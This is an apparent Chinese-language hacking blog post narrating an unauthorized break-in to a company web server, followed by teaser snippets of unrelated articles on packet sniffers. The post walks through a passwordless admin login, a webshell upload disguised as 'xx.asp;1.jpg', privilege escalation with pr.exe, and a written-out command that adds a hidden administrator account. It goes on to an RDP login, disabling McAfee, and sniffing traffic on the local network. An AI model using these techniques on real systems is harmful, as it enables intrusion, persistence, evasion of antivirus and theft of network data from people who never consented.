拿c段儲存到相簿
2013-7-28 15:17 上傳
看見了個很接近的c段
並且是乙個公司
一般的企業的都挺好日的
218.x.241.134的第乙個企業站點習慣性的在後面加了個admin
找到後台登陸進去
這個分店選擇
看見了系統管理組
登陸進去
後台是這個樣的
果斷manager 點選登陸
竟然不需要密碼
就進去了
找到後台上傳地方
果斷xx.asp;1.jpg
進入上傳成功
人品真不是蓋的!
複製位址
果斷進去webshell
習慣性的看下組建
支援ws
果斷找可寫目錄
發現可寫目錄
用菜刀吧cmd.exe和pr.exe上傳到這個可寫可讀目錄
執行命令
pr可以提權
溢位返回的是system許可權
新增個賬戶
c:\wmpub\wmiislog\pr.exe "net userxxoo ooxx /add & net localgroup administrators xxoo /add"執行命令新增使用者
顯示成功
因為已經新增好了
我就不在新增了
讀取一些登錄檔 3389的埠
顯示3366
果斷登陸
輸入賬戶和密碼
成功登陸進去
登陸進去
看見伺服器有麥咖啡
服務關掉
都得被殺掉
開啟配置選網絡卡
埠選擇
啟用嗅探器然後掃瞄一下mac位址
然後點選確定
新增一下
選擇一下要嗅探的主機
點選開始
坐等資料吧!
簡單網路嗅探c 實現
一 原理 用一些比喻,集線器網路中所有主機都連線在一條網線上,也就是說每台主機傳送的資料都將經過其他主機的門前 網絡卡 只是說一般網絡卡一看資料報報頭,這不是發給自己的,就不理這個包了,而我們現在要做的,就是敞開大門,不管這個包是發給誰的,都將其納入囊中。那麼如何做呢?只需將網絡卡設定為混雜模式。要...
一段程式的人生 第11章 嗅探
從第0章開始閱讀 第拾壹章 嗅探 要想進入這個可以的伺服器,現在唯一的希望就是它開放的論壇系統。我現在需要一對使用者和密碼,以便進一步了解這個論壇系統裡面的其他部分,看看能夠找到有價值的東西。我想,既然論壇放在這個機房的伺服器裡,那麼機房裡其他機器肯定是可以訪問它的。這樣,思路就有了,我得去了解機房...
用C 抓取網路資料報 嗅探器的設計原理
具體到程式設計實現上,這種對網絡卡混雜模式的設定是通過原始套接字 raw socket 來實現的,這也有別於通常經常使用的資料流套接字和資料報套接字。在建立了原始套接字後,需要通過setsockopt 函式來設定ip頭操作選項,然後再通過bind 函式將原始套接字繫結到本地網絡卡。為了讓原始套接字能...